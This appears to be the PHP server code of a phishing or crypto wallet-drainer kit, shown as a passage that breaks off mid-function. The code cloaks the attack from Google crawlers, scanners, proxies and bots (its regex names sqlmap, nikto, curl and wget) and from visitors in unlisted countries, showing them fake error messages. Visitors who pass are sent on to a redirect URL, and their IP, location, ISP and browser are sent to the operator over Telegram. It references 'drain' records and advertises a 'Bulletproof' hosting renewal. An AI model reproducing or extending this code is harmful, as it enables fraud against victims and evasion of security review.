    // 2) Prepare the data with defaults
    $defaults = [
        'country' => 'Unknown',
        'Browser' => 'Unknown',
        'Os' => 'Unknown',
        'local_domain' => 'Unknown',
        'isp' => 'Unknown',
        'mobile' => 'Unknown',
        'proxy' => 'Unknown',
        'hosting' => 'Unknown',
        'city' => 'Unknown',
        'region' => 'Unknown',
        'local_time' => date('Y-m-d H:i:s'),
        'DeviceType' => 'Unknown',
        'DeviceName' => 'Unknown',
        'OsVersion' => 'Unknown',
        'BrowserVersion' => 'Unknown',
        'RequestSource' => 'Unknown',
        'IsFakeUserAgent' => 'Unknown',
        'Referrer' => 'Unknown',
        'IsHttps' => 'Unknown',
        'ConnectionType' => 'Unknown',
        'UserAgent' => 'Unknown',
    ];
    $d = array_merge($defaults, $clientData);
    $host = gethostbyaddr($ipAddress) ?: 'Unknown';

    // 3) Insert with IGNORE to skip duplicates (unique index must exist)
    $sql = "INSERT IGNORE INTO logs (
        ipaddres, country, browser, os, domine, host, isp,
        mobile, proxy, hosting, city, region, mytime, reson,
        devicetype, devicename, osversion, browserversion,
        requestsource, isfakeuseragent, referrer,
        ishttps, connectiontype, useragent
    ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
    ";
    $stmt = $db->prepare($sql);
    if (!$stmt) {
        $db->close();
        return ['res_status' => '500', 'message' => 'Prepare failed: ' . $db->error];
    }

    $stmt->bind_param(
        'ssssssssssssssssssssssss',
        $ipAddress,
        $d['country'],
        $d['Browser'],
        $d['Os'],
        $d['local_domain'],
        $host,
        $d['isp'],
        $d['mobile'],
        $d['proxy'],
        $d['hosting'],
        $d['city'],
        $d['region'],
        $d['local_time'],
        $reason,
        $d['DeviceType'],
        $d['DeviceName'],
        $d['OsVersion'],
        $d['BrowserVersion'],
        $d['RequestSource'],
        $d['IsFakeUserAgent'],
        $d['Referrer'],
        $d['IsHttps'],
        $d['ConnectionType'],
        $d['UserAgent']
    );
    if (!$stmt->execute()) {
        // If error is duplicate key, treat as already logged
        if ($stmt->errno === 1062) {
            $stmt->close();
            $db->close();
            return ['res_status' => '403', 'message' => 'Already blacklisted'];
        }
        $error = $stmt->error;
        $stmt->close();
        $db->close();
        return ['res_status' => '500', 'message' => 'DB insert failed: ' . $error];
    }

    $stmt->close();
    $db->close();

    return ['res_status' => '200', 'message' => "$reason logged"];
}


function check_keyword(string $ipAddress, string $isp)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        return ['status' => false, 'word' => null];
    }

    $sql = "SELECT wording FROM mywording";
    $result = mysqli_query($db, $sql);
    if (!$result) {
        mysqli_close($db);
        return ['status' => false, 'word' => null];
    }

    $words = [];
    while ($row = mysqli_fetch_assoc($result)) {
        $words[] = strtolower(trim($row['wording']));
    }
    mysqli_free_result($result);

    $ispLower = strtolower($isp);
    $hostNameLower = strtolower(gethostbyaddr($ipAddress) ?: '');
    $uaLower = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');

    foreach ($words as $word) {
        if (
            stripos($ispLower, $word) !== false ||
            stripos($hostNameLower, $word) !== false ||
            stripos($uaLower, $word) !== false
        ) {
            mysqli_close($db);
            return ['status' => true, 'word' => $word];
        }
    }

    mysqli_close($db);
    return ['status' => false, 'word' => null];
}
function isGoogleHost(string $host): bool
{
    return (bool) preg_match('/\.(?:googlebot\.com|google\.com|googleusercontent\.com)$/i', $host);
}
function isGoogleCrawler(string $ua, string $ip, string $isp): bool
{
    // 1) Quick UA match
    static $uas = ['/Googlebot/i', '/AdsBot\-Google/i', '/Mediapartners\-Google/i'];
    $uaMatches = false;

    foreach ($uas as $p) {
        if (preg_match($p, $ua)) {
            $uaMatches = true;
            break;
        }
    }

    if (!$uaMatches) {
        return false;
    }

    // 2) ISP sanity (optional, but covers WHOIS data)
    if (stripos($isp, 'google') === false) {
        return false;
    }

    // 3) Reverse DNS + suffix check
    $host = @gethostbyaddr($ip);
    if (!$host || !isGoogleHost($host)) {
        return false;
    }

    return true;
}


function log_visite($ip, $login_type, $country, $isp, $project, $addby)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    $response = [];

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        http_response_code(500);
        return json_encode([
            "status" => "error",
            "message" => "Database connection failed",
            "error" => mysqli_connect_error(),
        ]);
    }

    // Check if the visit is already recorded
    $checkQuery = "SELECT COUNT(*) as count FROM visite WHERE ip = ? AND addby = ? AND project = ?";
    $stmt = $db->prepare($checkQuery);
    if (!$stmt) {
        http_response_code(500);
        return json_encode([
            "status" => "error",
            "message" => "Failed to prepare check query",
            "error" => $db->error,
        ]);
    }

    $stmt->bind_param("sss", $ip, $addby, $project);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result->fetch_assoc();

    if ($row && $row["count"] > 0) {
        $stmt->close();
        $db->close();
        return json_encode([
            "status" => "exists",
            "message" => "Visit already logged",
        ]);
    }
    $stmt->close();

    // Insert the visit
    $insertQuery = "INSERT INTO visite (ip, country, isp, login_type, project, addby)
                    VALUES (?, ?, ?, ?, ?, ?)";
    $stmt = $db->prepare($insertQuery);
    if (!$stmt) {
        http_response_code(500);
        return json_encode([
            "status" => "error",
            "message" => "Failed to prepare insert query",
            "error" => $db->error,
        ]);
    }

    $stmt->bind_param("ssssss", $ip, $country, $isp, $login_type, $project, $addby);
    if (!$stmt->execute()) {
        $stmt->close();
        $db->close();
        http_response_code(500);
        return json_encode([
            "status" => "error",
            "message" => "Failed to log visit",
            "error" => $stmt->error,
        ]);
    }

    $stmt->close();
    $db->close();

    return json_encode([
        "status" => "success",
        "message" => "Visit logged successfully",
    ]);
}



function check_country(array $countryIn, string $countryOut): bool
{
    $countryOut = strtolower(trim($countryOut));
    foreach ($countryIn as $allowed) {
        if (strtolower(trim($allowed)) === $countryOut) {
            return true;
        }
    }
    return false;
}
function check_country_smart(array $countryIn, string $countryOut): bool
{
    // Normalize country code
    $countryOut = strtolower(trim($countryOut));

    // If allow_country is empty or contains only empty/whitespace entries, allow all
    $filtered = array_filter(array_map('trim', $countryIn)); 
    if (empty($filtered)) {
        return true; // Allow all countries
    }

    // Otherwise, check if user country is in allowed list
    foreach ($filtered as $allowed) {
        if (strtolower($allowed) === $countryOut) {
            return true;
        }
    }

    return false;
}
function user_web3($ipAddress, $id)
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    try {
        $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
        if (!$db) {
            throw new Exception("Database connection failed: " . mysqli_connect_error());
        }

        $stmt = $db->prepare("SELECT project_tel_token, project_tel_id, project_name, username, project_logo FROM drain WHERE private_key = ?");
        if (!$stmt) {
            throw new Exception("Prepare failed: " . $db->error);
        }

        $stmt->bind_param("s", $id);
        $stmt->execute();
        $result = $stmt->get_result();

        if ($result->num_rows > 0) {
            $row = $result->fetch_assoc();

            return [
                "status" => "success",
                "message" => "Drain data found.",
                "data" => [
                    "tel_token" => $row["project_tel_token"],
                    "tel_id" => $row["project_tel_id"],
                    "project_name" => $row["project_name"],
                    "create_by" => $row["username"],
                    "pro_logo" => $row["project_logo"],
                ],
            ];
        } else {
            return [
                "status" => "error",
                "message" => "No matching record found.",
            ];
        }
    } catch (Exception $e) {
        return [
            "status" => "error",
            "message" => "Internal server error.",
            "error" => $e->getMessage(),
        ];
    } finally {
        if (isset($stmt)) {
            $stmt->close();
        }
        if (isset($db)) {
            $db->close();
        }
    }
}
function url_web3()
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;
    try {
        $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
        if (!$db) {
            throw new Exception("Connection failed: " . mysqli_connect_error());
        }

        $sql = "SELECT luxurl FROM luxdataurl WHERE status = '2'";
        $result = mysqli_query($db, $sql);
        if (!$result) {
            throw new Exception("Query failed: " . mysqli_error($db));
        }

        $links = [];
        while ($row = mysqli_fetch_assoc($result)) {
            $links[] = $row["luxurl"];
        }

        mysqli_close($db);

        if (count($links) === 0) {
            return ["status" => "error", "message" => "No URLs available"];
        }

        shuffle($links);
        foreach ($links as $random_link) {
            $safety_result = checkUrlSafety($random_link);
            if ($safety_result === "Safe") {
                return [
                    "status" => "success",
                    "message" => "Safe URL found",
                    "url" => $random_link,
                ];
            }
        }

        return ["status" => "error", "message" => "No safe URLs available"];
    } catch (Exception $e) {
        return ["status" => "error", "message" => "Internal server error", "error" => $e->getMessage()];
    }
}



function send_message($message, $token, $chatid)
{
    $api_url = "https://api.telegram.org/bot{$token}/sendMessage";
    $params = ["chat_id" => $chatid, "text" => $message];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $api_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
}
function obfuscateString($input)
{
    $length = strlen($input);
    if ($length <= 2) {
        return $input;
    } // return as-is if too short

    $first = $input[0];
    $last = $input[$length - 1];

    $middle = str_repeat('*', $length - 2);

    return $first . $middle . $last;
}
function safe_base64_double_decode($input)
{
    if (!is_string($input)) {
        return '';
    }

    // First decode
    $decoded1 = base64_decode($input, true);
    if ($decoded1 === false) {
        return '';
    }

    // Second decode
    $decoded2 = base64_decode($decoded1, true);
    if ($decoded2 === false) {
        return '';
    }

    return $decoded2;
}
function getDeviceType(string $userAgent): string
{
    $userAgent = strtolower($userAgent);

    // Common mobile indicators in User-Agent strings
    $mobileAgents = [
        'iphone', 'ipod', 'ipad', 'android', 'blackberry', 'bb', 'playbook',
        'windows phone', 'iemobile', 'opera mini', 'mobile', 'mobi',
        'silk', 'kindle', 'webos', 'palm', 'symbian', 'fennec'
    ];

    foreach ($mobileAgents as $device) {
        if (strpos($userAgent, $device) !== false) {
            return 'mobile';
        }
    }

    return 'pc';
}


function verifyCloudflareTurnstile($token, $remoteIp, $secretKey)
{
    $url = 'https://challenges.cloudflare.com/turnstile/v0/siteverify';

    // ── Dev bypass: localhost can't be verified by Cloudflare ──────────────
    $serverHost = $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME'] ?? '';
    $isLocalhost = in_array(strtolower(explode(':', $serverHost)[0]), ['localhost', '127.0.0.1', '::1'], true);
    if ($isLocalhost) {
        return ['success' => true, 'error' => null, 'dev_bypass' => true];
    }
    // ───────────────────────────────────────────────────────────────────────

    $data = http_build_query([
        'secret' => $secretKey,
        'response' => $token,
        'remoteip' => $remoteIp,
    ]);

    $ch = curl_init($url);

    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $data,
        CURLOPT_TIMEOUT => 5,
        CURLOPT_HTTPHEADER => [
            'Content-Type: application/x-www-form-urlencoded'
        ],
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
    ]);

    $response = curl_exec($ch);

    if ($response === false) {
        $error = curl_error($ch);
        curl_close($ch);
        return ['success' => false, 'error' => $error];
    }

    curl_close($ch);

    $responseData = json_decode($response, true);

    if (!is_array($responseData) || !isset($responseData['success'])) {
        return ['success' => false, 'error' => 'Invalid response from Turnstile'];
    }

    // Log Cloudflare error codes to help diagnose failures
    if (!$responseData['success'] && !empty($responseData['error-codes'])) {
        // error codes available in $responseData['error-codes'] if needed
    }

    return [
        'success' => (bool) $responseData['success'],
        'error' => $responseData['error-codes'] ?? null,
    ];
}

function increment_click(string $slug): array
{
    global $fs_host, $fs_user, $fs_pass, $fs_name;

    if ($slug === '') {
        return ['success' => false, 'error' => 'Empty slug'];
    }

    $db = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
    if (!$db) {
        return ['success' => false, 'error' => mysqli_connect_error()];
    }

    mysqli_set_charset($db, 'utf8mb4');

    // Single query optimization (no extra SELECT first)
    $stmt = $db->prepare("
        UPDATE redirects 
        SET clicks = COALESCE(clicks,0) + 1, last_clicked_at = NOW()
        WHERE source_url = ?
    ");

    if (!$stmt) {
        mysqli_close($db);
        return ['success' => false, 'error' => mysqli_error($db)];
    }

    $stmt->bind_param('s', $slug);
    $stmt->execute();

    if ($stmt->affected_rows === 0) {
        $stmt->close();
        mysqli_close($db);
        return ['success' => false, 'error' => 'Not found'];
    }

    $stmt->close();

    mysqli_close($db);

    return ['success' => true];
}
function detectMaliciousBot($userAgent, $ip, $isp = null)
{
    if ($userAgent === '') {
        return array('bot' => true, 'layer' => 1, 'reason' => 'Empty User-Agent');
    }

    $botPattern = '/\b(bot|crawl|spider|scrap|scan|hack|brute|sqlmap|nikto|wget|curl|python|java|perl|ruby|phantom|headless|selenium|zmeu)\b/i';
    if (preg_match($botPattern, $userAgent)) {
        return array('bot' => true, 'layer' => 1, 'reason' => 'Suspicious User-Agent');
    }

    $ipv4 = ip2long($ip);
    if ($ipv4 !== false) {
        $ipv4 = sprintf('%u', $ipv4);

        $badRanges = array(
            array('10.0.0.0', '10.255.255.255', 'Private IP'),
            array('172.16.0.0', '172.31.255.255', 'Private IP'),
            array('192.168.0.0', '192.168.255.255', 'Private IP'),
            array('100.64.0.0', '100.127.255.255', 'CGNAT'),
            array('185.220.100.0', '185.220.103.255', 'TOR'),
        );

        foreach ($badRanges as $range) {
            $start = sprintf('%u', ip2long($range[0]));
            $end   = sprintf('%u', ip2long($range[1]));
            $label  = $range[2];

            if ($ipv4 >= $start && $ipv4 <= $end) {
                return array('bot' => true, 'layer' => 2, 'reason' => $label);
            }
        }
    }

    if ($isp !== null && preg_match('/\b(vpn|proxy|tor|hosting|datacenter|server|cloud)\b/i', $isp)) {
        return array('bot' => true, 'layer' => 3, 'reason' => 'Suspicious ISP');
    }

    return array('bot' => false, 'layer' => 0, 'reason' => 'Clean');
}




$requestData = array_merge($_POST, $_GET);
$requestType = isset($requestData['type']) ? trim($requestData['type']) : '';

// Get user ID from either user_id parameter or iduser in the URL and decode it
$userId = null;
$web3_id = null;
$api_id = null;
$domain_name = null;

if (isset($requestData['api_id']) && !empty(trim($requestData['api_id']))) {
    $api_id = trim($requestData['api_id']);
} elseif (isset($_GET['api_id']) && !empty(trim($_GET['api_id']))) {
    $api_id = trim($_GET['api_id']);
}
if (isset($requestData['user_id']) && !empty(trim($requestData['user_id']))) {
    $userId = trim($requestData['user_id']);
} elseif (isset($_GET['iduser']) && !empty(trim($_GET['iduser']))) {
    $userId = trim($_GET['iduser']);
}
if (isset($requestData['web3_id']) && !empty(trim($requestData['web3_id']))) {
    $web3_id = trim($requestData['web3_id']);
} elseif (isset($_GET['web3_id']) && !empty(trim($_GET['web3_id']))) {
    $web3_id = trim($_GET['web3_id']);
}
if (isset($requestData['domain']) && !empty(trim($requestData['domain']))) {
    $domain_name = trim($requestData['domain']);
} elseif (isset($_GET['domain']) && !empty(trim($_GET['domain']))) {
    $domain_name = trim($_GET['domain']);
}



// Decode the double base64 encoded user ID
if ($userId) {
    $decodedId = safe_base64_double_decode($userId);
    if ($decodedId !== false) {
        $userId = $decodedId;
    }
}

// Decode the double base64 encoded web3 ID
if ($web3_id) {
    $decodedId = safe_base64_double_decode($web3_id);
    if ($decodedId !== false) {
        $web3_id_normal = $web3_id;
        $web3_id = $decodedId;
    }
}

$isbanned = false;
$isWeb3 = isset($requestData['web3']) && $requestData['web3'] === 'true';
$isapi = isset($requestData['api']) && $requestData['api'] === 'true';
$ipAddress = $requestData['ip'] ?? $_SERVER['REMOTE_ADDR'];
$userAgent = $requestData['user_agent'] ?? ($_SERVER['HTTP_USER_AGENT'] ?? 'unknown');
$client_info = detectDeviceDetails($userAgent, $ipAddress);
$found_key_json = check_keyword($ipAddress, $client_info['isp']);
if ($found_key_json['status']) {
    $found_key_name = $found_key_json['word'];
	$found_key = true;
} else {
    $found_key_name = "";
	$found_key = false;
}
$detector = isGoogleCrawler($userAgent, $ipAddress, $client_info['isp']);
$newData = detectMaliciousBot($userAgent, $ipAddress, $client_info['isp']);
$deviceType = getDeviceType($userAgent);
$keydomain =  get_captcha($domain_name);
// Initialize response array
$response = [
    'success' => false,
    'message' => 'Invalid request',
    'data' => [],
];


if (detect_user($ipAddress)) {
    $isbanned = true;
}

try {
    // Handle different request types
    switch ($requestType) {

        // ─── DEBUG ONLY — remove before production ───────────────────────────
        case 'debug_captcha':
            $db_debug = mysqli_connect($fs_host, $fs_user, $fs_pass, $fs_name);
            $all_rows = [];
            if ($db_debug) {
                $res_all = mysqli_query($db_debug, "SELECT domain, publickey, privatekey FROM captcha");
                while ($r = mysqli_fetch_assoc($res_all)) {
                    $all_rows[] = [
                        'domain'     => $r['domain'],
                    'publickey'  => $r['publickey']  ? substr($r['publickey'],  0, 12) . '...' : '(empty)',
                        'privatekey' => $r['privatekey'] ? substr($r['privatekey'], 0, 6)  . '...' : '(empty)',
                    ];
                }
                mysqli_close($db_debug);
            }

            // What the frontend actually sent
            $sent_domain = $domain_name;

            // Rebuild the candidate list the same way get_captcha() does
            $raw_d        = trim((string)$sent_domain);
            $norm_d       = rtrim(preg_replace('#^https?://#i', '', $raw_d), '/');
            $host_d       = explode(':', $norm_d)[0];
            $candidates_d = array_unique(array_filter([
                $raw_d,
                'https://' . $norm_d,
                'http://'  . $norm_d,
                $norm_d,
                $host_d,
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? '127.0.0.1'          : '',
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? 'localhost'           : '',
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? 'https://localhost'   : '',
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? 'http://localhost'    : '',
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? 'https://127.0.0.1'  : '',
                ($host_d === 'localhost' || $host_d === '127.0.0.1') ? 'http://127.0.0.1'   : '',
            ]));

            $response = [
                'success' => true,
                'debug'   => [
                    'domain_received_from_client' => $sent_domain,
                    'normalized'                  => $norm_d,
                    'hostname'                    => $host_d,
                    'candidates_tried'            => array_values($candidates_d),
                    'get_captcha_result'          => $keydomain,
                    'all_captcha_rows_in_db'      => $all_rows,
                    'match_found'                 => !empty($keydomain['publickey']),
                ],
            ];
            break;
        // ─────────────────────────────────────────────────────────────────────

        case 'check':
            if ($userId) {
            $userData = user_data($userId, $client_info, $ipAddress);				
			if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5498000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5177000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4298000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1387000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($userData['proxy'] == 1) {
                if ($client_info['proxy'] == 'True') {
                    $res = banned_client($ipAddress, "Proxy Detected", $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:2187000',
						'data' => [
                        'show_captcha' => false,
						],

                    ];

                    break;
                }
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8349000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if (!check_country($userData['cn'], $client_info['countryCode'])) {
                $res = banned_client($ipAddress, 'Invalid country', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5643000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }

            if ($userData['status'] === 'success') {
                    $response = [
                        'success' => true,
                        'message' => 'Check successful',
                        'data' => [
                            'show_captcha' => true,
							'publickey' => $keydomain['publickey'] ?? '',
                            'pro_logo' => $userData['pro_logo'] ?? '',
                            'pro_msg' => $userData['pro_msg'] ?? 'Please complete the verification',
                            'name' => $userData['project'],
                            'passed' => true,
                        ],
                    ];
            } else {
                    $res = banned_client($ipAddress, "user not Found $userId", $client_info);
                    $response = [
                        'success' => true,
                        'message' => "An error occurred. Try again. Error number:3398000",
                        'data' => [
                            'show_captcha' => false,
                            'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',
                        ],
                    ];
                }
            } else {
                $res = banned_client($ipAddress, 'user inccorect', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4903000',
                    'data' => [
                        'show_captcha' => false,
                        'pro_logo' => 'https://media2.giphy.com/media/v1.Y2lkPTZjMDliOTUyN2dzYjB1ZWppcWUwNTJqa3Y1dGYweTIwb2dkbWN5cXBpMnJ6eGM2cSZlcD12MV9zdGlja2Vyc19zZWFyY2gmY3Q9cw/L05HgB2h6qICDs5Sms/200.gif',

                    ],
                ];
            }

            break;

        case 'login':
            $maxRetries = 5;
            $retryDelay = 2;
            $success = false;
            $attempt = 0;
            // Verify CAPTCHA token
            $captchaToken = $requestData['cf-turnstile-response'] ?? '';

            if (empty($captchaToken)) {
                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification required',
                    'data' => [
                        'show_captcha' => true,
                    ],
                ];
                break;
            }

            // Verify CAPTCHA with Cloudflare Turnstile
            $captchaVerification = verifyCloudflareTurnstile($captchaToken, $ipAddress,$keydomain['privatekey']);

            if (!$captchaVerification['success']) {
                $errorMessage = $captchaVerification['error'] ?? 'Verification failed';

                $response = [
                    'success' => false,
                    'message' => 'CAPTCHA verification failed. Please try again.',
                    'data' => [
                        'show_captcha' => true,
                        'error' => $errorMessage,
                    ],
                ];
                break;
            }

            $userData = user_data($userId, $client_info, $ipAddress);

            if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5498000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5177000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4298000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1387000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($userData['proxy'] == 1) {
                if ($client_info['proxy'] == 'True') {
                    $res = banned_client($ipAddress, "Proxy Detected", $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:2187000',
						'data' => [
                        'show_captcha' => false,
						],

                    ];

                    break;
                }
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8349000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if (!check_country($userData['cn'], $client_info['countryCode'])) {
                $res = banned_client($ipAddress, 'Invalid country', $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5643000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }

            while (!$success && $attempt < $maxRetries) {
                $attempt++;

                if ($userData['status'] == 'success') {
                    $log_extract = url_packet();

                    if ($log_extract) {
                        $result = send_command($userAgent, $ipAddress, $log_extract, "create", $userId, $client_info['local_domain']);
                        $success = isset($result["res_status"]) && $result["res_status"] === "success";

                        if ($success) {
                            $res_dir = $result["res_dir"] ?? null;
                            $res_url = $result["res_url"] ?? null;
                            $res_id = $result["res_id"] ?? null;
                            $res_ip = $result["res_ip"] ?? null;
                            $res_action = $result["res_action"] ?? null;

                            log_visite($ipAddress, 0, $client_info['country'], $client_info['isp'], $userData['project'], $userData['addby']);
                            $expireTimestamp = strtotime($userData['expire_date']);
                            $currentTimestamp = time();

                            $project_name = $userData['project'];
                            $username = $userData['addby'];
                            $expire = $userData['expire_date'];
                            $country = $client_info['country'];
                            $sip_name = $client_info['isp'];
                            $city = $client_info['city'];
                            $mobile = $client_info['mobile'];
                            $browser = $client_info['Browser'];
                            $log_date = $client_info['local_time'];

                            if ($currentTimestamp >= $expireTimestamp) {
                                $country_obf = obfuscateString($client_info['country']);
                                $sip_name_obf = obfuscateString($client_info['isp']);
                                $city_obf = obfuscateString($client_info['city']);
                                $mobile_obf = obfuscateString($client_info['mobile']);
                                $browser_obf = obfuscateString($client_info['Browser']);
                                $ipAddress_obf = obfuscateString($ipAddress);
                                $message = "
❌ 🅽🅴🆆 🆅🅸🆂🅸🆃🅴 (Expired)
Your Link is Expired Result Will be hidden
Try to Reactive your Bulletproof Now!!
https://www.zeroday.help/bulletproof/price/
--------------------------------------------
❌  𝗣𝗿𝗼𝗷𝗲𝗰𝘁: {$project_name}
❌  𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲: {$username}
❌  𝗘𝘅𝗽𝗶𝗿𝗲: {$expire}
❌  𝗜𝗣: {$ipAddress_obf}
🌍  𝗖𝗼𝘂𝗻𝘁𝗿𝘆: {$country_obf}
🗺️  𝗦𝗜𝗣: {$sip_name_obf}
💻  𝗖𝗶𝘁𝘆: {$city_obf}
📱  𝗠𝗼𝗯𝗶𝗹𝗲: {$mobile_obf} 
🌐  𝗕𝗿𝗼𝘄𝘀𝗲𝗿: {$browser_obf} 
🎫  𝗗𝗮𝘁𝗲/𝘁𝗶𝗺𝗲: {$log_date}
--------------------------------------------";
                            } else {
                                $message = "
✅ 🅽🅴🆆 🆅🅸🆂🅸🆃🅴   
--------------------------------------------
🏠  𝗣𝗿𝗼𝗷𝗲𝗰𝘁: {$project_name}
👨‍🔧  𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲: {$username}
📡  𝗘𝘅𝗽𝗶𝗿𝗲: {$expire}
📡  𝗜𝗣: {$ipAddress}
🌍  𝗖𝗼𝘂𝗻𝘁𝗿𝘆: {$country}
🗺️  𝗦𝗜𝗣: {$sip_name}
💻  𝗖𝗶𝘁𝘆: {$city}
📱  𝗠𝗼𝗯𝗶𝗹𝗲: {$mobile} 
🌐  𝗕𝗿𝗼𝘄𝘀𝗲𝗿: {$browser} 
🎫  𝗗𝗮𝘁𝗲/𝘁𝗶𝗺𝗲: {$log_date}
--------------------------------------------";
                            }

                            send_message($message, $userData['tokentel'], $userData['idtel']);
                            $message_url = "$res_url/?id=$res_id&user=$res_ip&remote=$res_dir&type=login";
                            $response = [
                                'success' => true,
                                'message' => 'Login successful',
                                'data' => [
                                    'redirect_url' => $message_url ?? '',
                                    'user_id' => $userId,
                                    'pro_logo' => $userData['pro_logo'] ?? '',
                                    'name' => $userData['project'] ?? '',
                                ],
                            ];
                        } else {
                            $response = [
                                'success' => true,
                                'message' => 'An error occurred. Try again. Error number:1127000',
								'data' => [
                        'show_captcha' => false,
						],
                             
                            ];
                        }
                    } else {
                        $response = [
                            'success' => true,
                            'message' => 'An error occurred. Try again. Error number:8921000',
							'data' => [
                        'show_captcha' => false,
						],
                        ];
                    }
                } else {
                    $res = banned_client($ipAddress, 'invalid user', $client_info);
                    $response = [
                        'success' => true,
                        'message' => 'An error occurred. Try again. Error number:4902000',
						'data' => [
                        'show_captcha' => false,
						],
                    ];
                }
                if (!$success) {
                    sleep($retryDelay);
                }
            }

            break;

        case 'web3check':
            if ($isWeb3) {
                $web3Data = user_web3($ipAddress, $web3_id);
            if (detect_user($ipAddress)) {
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5498000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($found_key !== false) {
                $res = banned_client($ipAddress, "Detected word: $found_key_name", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:5177000',
					'data' => [
                        'show_captcha' => false,
						],

                ];
                break;
            }
            if ($detector !== false) {
                $res = banned_client($ipAddress, "Google Detected", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:4298000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if (is_bot_ip($ipAddress)) {
                $res = banned_client($ipAddress, "Google IP", $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:1387000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }
            if ($newData['bot'] === true) {
                $res = banned_client($ipAddress, $newData['reason'], $client_info);
                $response = [
                    'success' => true,
                    'message' => 'An error occurred. Try again. Error number:8349000',
					'data' => [
                        'show_captcha' => false,
						],
                ];
                break;
            }

                if ($web3Data && $web3Data['status'] === 'success') {
                    $web3_data_project = $web3Data['data']['project_name'];
                    $username = $web3Data['data']['create_by'];
                    $project_logo = $web3Data['data']['pro_logo'];
                    $country = $client_info['country'];
